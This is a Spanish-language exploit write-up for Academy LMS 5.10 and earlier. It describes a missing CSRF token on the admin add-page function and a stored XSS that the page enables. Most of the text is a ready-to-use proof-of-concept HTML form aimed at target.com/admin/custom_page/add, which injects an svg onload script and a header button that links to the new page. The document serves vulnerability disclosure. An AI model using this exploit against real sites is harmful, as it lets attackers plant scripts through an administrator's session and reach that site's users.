
Academy LMS <= 5.10 CSRF / XSS
Academy LMS <= 5.10 CSRF / XSS
Academy LMS es una aplicación donde las personas pueden crear y promocionar cursos. La función de añadir una nueva página es vulnerable a CSRF, ya que no hay ningún token que impida este ataque. Además, esta página puede usarse para cargar un payload XSS almacenado.
El primer paso de nuestra prueba de concepto es autenticarse en la plataforma con un usuario administrador.
Después, solo accede a la página que contiene el código para explotar la vulnerabilidad; verás que se añadirá un nuevo botón a la página de inicio del sitio web, que redirige a la página xss.
Código utilizado en el exploit:
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://target.com/admin/custom_page/add" method="POST">
<input type="hidden" name="page_title" value="CSRF XSS" />
<input type="hidden" name="page_content" value=""><svg onload=alert(document.domain);> ;" />
<input type="hidden" name="files" value="" />
<input type="hidden" name="button_title" value="CSRF XSS" />
<input type="hidden" name="button_position" value="header" />
<input type="hidden" name="page_url" value="xss" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>